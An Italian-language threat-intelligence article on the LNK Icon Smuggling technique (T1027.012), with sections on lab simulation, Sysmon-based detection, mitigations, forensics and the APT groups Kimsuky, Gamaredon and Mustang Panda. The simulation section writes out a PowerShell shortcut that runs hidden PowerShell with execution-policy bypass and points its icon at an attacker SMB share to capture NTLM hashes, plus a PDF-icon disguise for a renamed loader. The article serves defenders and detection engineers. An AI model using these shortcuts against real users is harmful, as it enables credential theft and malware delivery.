LNK Icon Smuggling: Obfuscated Files or Information – LNK Icon Smuggling (T1027.012)

Per simulare LNK Icon Smuggling in laboratorio serve comprendere la struttura binaria del file .LNK e, in particolare, come Windows gestisce il campo IconEnvironmentDataBlock. L'approccio più diretto sfrutta PowerShell e l'oggetto COM WScript.Shell, che espone le proprietà del collegamento in modo programmabile.

Il primo passo è creare un file LNK il cui campo icona punti a una risorsa controllata dall'attaccante. In PowerShell:

$shell = New-Object -ComObject WScript.Shell; $lnk = $shell.CreateShortcut("$env:USERPROFILE\Desktop\Report.lnk"); $lnk.TargetPath = "cmd.exe"; $lnk.Arguments = "/c powershell -w hidden -ep bypass -f C:\Temp\stage2.ps1"; $lnk.IconLocation = "\<IP-ATTACCANTE>\share\document.ico"; $lnk.Save()

In questo esempio il target path invoca cmd.exe che a sua volta lancia PowerShell in modalità nascosta, mentre il campo IconLocation punta a una share SMB controllata. Quando la vittima visualizza il file nel suo file manager, Windows tenta di risolvere l'icona remota, generando traffico SMB verso l'esterno — utile anche per catturare hash NTLMv2 con Responder (open source).

Per replicare lo scenario con download HTTP, si può usare un approccio più sofisticato modificando il campo icona affinché punti a un URL. Strumenti come pylnk3 (open source), libreria Python per la manipolazione programmatica di file LNK, permettono di impostare i singoli campi della struttura binaria con granularità maggiore rispetto all'oggetto COM. Il vantaggio è il controllo completo sui metadata, inclusi i campi di padding che Kimsuky utilizza per offuscare il contenuto del target field con spazi aggiuntivi.

Per simulare la catena completa alla maniera di Mustang Panda, crea un LNK che mostri l'icona di un PDF legittimo estratta da AcroRd32.exe e configura il target per eseguire un binario rinominato:

$lnk.IconLocation = "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe,0"; $lnk.TargetPath = "C:\Users\Public\office.exe"

Il binario office.exe — nel contesto di TONESHELL — è in realtà il loader malevolo. In laboratorio, sostituiscilo con un payload benigno di Atomic Red Team (open source) per validare la detection senza rischi.

Sul lato server, configura un listener con Impacket (open source) per catturare le connessioni SMB o usa Python http.server per servire i payload via HTTP. Verifica con LECmd di Eric Zimmerman (open source) che i campi del file LNK prodotto siano consistenti con quelli osservati in the wild:

LECmd.exe -f Report.lnk --json --jsonpretty

Questo comando produce un dump JSON completo di tutti i metadata del file LNK, inclusi IconLocation, TargetPath, Arguments e gli extra data blocks.

La detection di LNK Icon Smuggling ruota attorno a un principio chiave: correlare l'esecuzione di un file .LNK con l'attività di rete o i processi figli anomali che ne derivano. L'analytic AN1134 descrive esattamente questo pattern — un file LNK viene aperto e, in una finestra temporale breve, si osserva traffico verso IP o domini sospetti oppure l'estrazione di risorse embedded.

La log source primaria è Sysmon (open source), in particolare l'EventCode 1 (Process Creation). Quando un utente fa doppio clic su un file LNK, explorer.exe genera il processo specificato nel target path. L'alert deve cercare catene in cui explorer.exe è parent di cmd.exe, powershell.exe, mshta.exe o wscript.exe con argomenti che referenziano percorsi insoliti — directory come C:\Users\Public, cartelle temporanee, o percorsi UNC.

L'EventCode 11 (FileCreate) di Sysmon cattura la creazione di file .LNK in posizioni anomale come la cartella dei download o directory temporanee. L'EventCode 3 (Network Connection) completa il quadro: processi come explorer.exe che aprono connessioni SMB (porta 445) verso IP esterni sono un segnale forte, poiché la risoluzione di un'icona remota genera esattamente questo pattern.

Per il tuning, i parametri critici sono quattro:

• ParentProcessName: filtra su explorer.exe, winword.exe e altri launcher comuni per ridurre il rumore
• DestinationIP: escludi domini e IP interni noti; concentra l'attenzione su connessioni verso l'esterno
• TimeWindow: calibra la finestra tra esecuzione LNK e attività sospetta — gli avversari possono introdurre ritardi, ma tipicamente l'azione avviene entro 30-60 secondi
• FileExtension: traccia non solo i file .lnk ma anche i payload associati scaricati (.dat, .exe, .dll, .hta)

Sul fronte preventivo, la mitigazione M1040 raccomanda di abilitare le regole Attack Surface Reduction (ASR) di Microsoft Defender. La regola che blocca l'esecuzione di script potenzialmente offuscati è direttamente rilevante: impedisce che il payload scaricato tramite il campo icona venga poi eseguito da interpreti di scripting. La configurazione avviene via Group Policy o PowerShell con Set-MpPreference.

La mitigazione M1049 aggiunge un livello complementare: soluzioni antivirus/antimalware con analisi euristica possono ispezionare i file LNK al momento del download o della scrittura su disco, rilevando pattern sospetti nei metadati prima ancora che l'utente li apra. Abilita la scansione real-time e integra feed di threat intelligence cloud-based per coprire varianti zero-day.

I falsi positivi principali derivano da software aziendali legittimi che usano file LNK con percorsi di icona remoti — tipicamente tool di deployment o shortcut a risorse di rete interne. Crea una whitelist basata sugli hash dei file LNK aziendali noti e sui percorsi UNC del dominio interno.

L'analisi forense di un attacco basato su LNK Icon Smuggling parte dal file .LNK stesso, che rappresenta l'artefatto primario. Ogni file di collegamento Windows è una struttura binaria con header fisso e sezioni opzionali: il campo IconEnvironmentDataBlock (offset variabile, identificato dal signature 0xA0000007) contiene il percorso dell'icona che ha innescato il download.

Lo strumento LECmd (open source) di Eric Zimmerman è il riferimento per il parsing forense dei file LNK. L'output strutturato espone tutti i campi rilevanti: TargetPath, Arguments, IconLocation, WorkingDirectory, timestamp MAC (creazione, modifica, ultimo accesso) e i cosiddetti extra data blocks. Presta particolare attenzione al campo Arguments: come documentato per Kimsuky, il target field può essere imbottito con spazi extra per nascondere comandi malevoli che non sarebbero visibili nelle proprietà standard del collegamento.

LECmd.exe -f "C:\Evidence\Report.lnk" --csv C:\Output

Questo comando produce un CSV parsabile con tutti i metadata, ideale per l'ingestione in una timeline.

Sul filesystem della vittima, ricostruisci la sequenza temporale incrociando più fonti. I Jump List (file AutomaticDestinations-ms nella directory AppData\Roaming\Microsoft\Windows\Recent) registrano l'apertura di file LNK e il timestamp dell'interazione utente. Il registro NTUSER.DAT sotto la chiave Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.lnk conserva gli ultimi file .LNK aperti.

Per tracciare l'attività di rete generata dal campo icona, i log del firewall Windows o i log proxy sono essenziali. Se Sysmon era attivo al momento dell'incidente, l'EventCode 3 fornisce il timestamp esatto della connessione verso la risorsa remota dell'icona, mentre l'EventCode 1 documenta la catena di processi figli generata dall'esecuzione del target path.

Nel caso di Mustang Panda e del malware TONESHELL, cerca specificamente un binario denominato office.exe in percorsi non standard — il loader si maschera da eseguibile Office legittimo, ma la sua collocazione fuori da Program Files è un indicatore immediato. Verifica l'hash del file contro database come VirusTotal (freemium) e analizza i Prefetch (C:\Windows\Prefetch\OFFICE.EXE-*.pf) con PECmd (open source) per determinare quante volte e quando il binario è stato eseguito.

Per quanto riguarda Gamaredon Group, il pattern prevede script malevoli nascosti nel file LNK: cerca artefatti di esecuzione script nei log PowerShell (EventCode 4104 per lo Script Block Logging) e nei log di Windows Script Host. La correlazione temporale tra apertura del file LNK (Jump List) e prima esecuzione dello script (log PowerShell) definisce con precisione il momento dell'initial compromise.

Tre gruppi APT distinti adottano LNK Icon Smuggling, ma con obiettivi geopolitici e pattern operativi profondamente diversi. La convergenza sulla stessa tecnica rivela una tendenza trasversale: sfruttare la fiducia implicita che gli utenti e i sistemi di sicurezza ripongono nei file di collegamento Windows.

Kimsuky (G0094), attribuito alla Corea del Nord, utilizza il campo icon location per eseguire script malevoli e aggiunge un ulteriore livello di offuscamento imbottendo il target field con spazi extra. Questa doppia strategia — abuso del campo icona e padding del target — indica un threat actor che conosce nel dettaglio la struttura binaria dei file LNK e investe in evasion granulare. I target tipici di Kimsuky sono think tank, organizzazioni governative e istituti di ricerca, prevalentemente in Corea del Sud e nei paesi alleati.

Gamaredon Group (G0047), legato alla Russia con focus sull'Ucraina, impiega file LNK per nascondere ed eseguire script malevoli. L'approccio di Gamaredon è storicamente più orientato al volume che alla sofisticazione: campagne massive con turnover rapido dell'infrastruttura. L'uso di LNK Icon Smuggling si inserisce in un arsenale che privilegia la persistenza e la rapidità di compromissione rispetto alla stealth prolungata.

Mustang Panda (G0129), gruppo di spionaggio cinese focalizzato sul Sud-Est asiatico e sull'Europa, porta la tecnica a un livello di social engineering superiore. I file LNK vengono programmati per mostrare l'icona di un PDF, inducendo la vittima a credere di aprire un documento. L'esecuzione reale lancia un binario denominato office.exe — il loader del malware TONESHELL (S1239), che rappresenta il collegamento operativo diretto tra tecnica e tooling di Mustang Panda.

Il pattern geografico è significativo: tre aree operative distinte (penisola coreana, Europa orientale, Sud-Est asiatico) con un denominatore comune nella scelta del vettore. Questo suggerisce che LNK Icon Smuggling sia una tecnica "convergente" — scoperta e adottata indipendentemente da gruppi diversi perché efficace contro difese standard.

Per l'analista di threat intelligence, il segnale più rilevante è il legame TONESHELL → Mustang Panda → LNK con icona PDF. Quando in un'indagine emergono file LNK con icona PDF che lanciano eseguibili rinominati, il pivot verso l'ecosistema Mustang Panda diventa prioritario. Analogamente, LNK con padding nel target field orientano verso Kimsuky, mentre LNK con script embedded in contesti ucraini puntano a Gamaredon.

Il trend evolutivo probabile è l'estensione della tecnica ad altri formati container che supportano metadati con riferimenti esterni — un principio di evasion generalizzabile che merita monitoraggio proattivo nelle regole di detection.

Framework MITRE ATT&CK v16: T1027.012, TA0005, G0094, G0047, G0129, S1239, M1049, M1040, DET0405/AN1134. Integrato con conoscenza professionale per tool e procedure operative (LECmd, PECmd, pylnk3, Responder, Impacket, Atomic Red Team, Sysmon).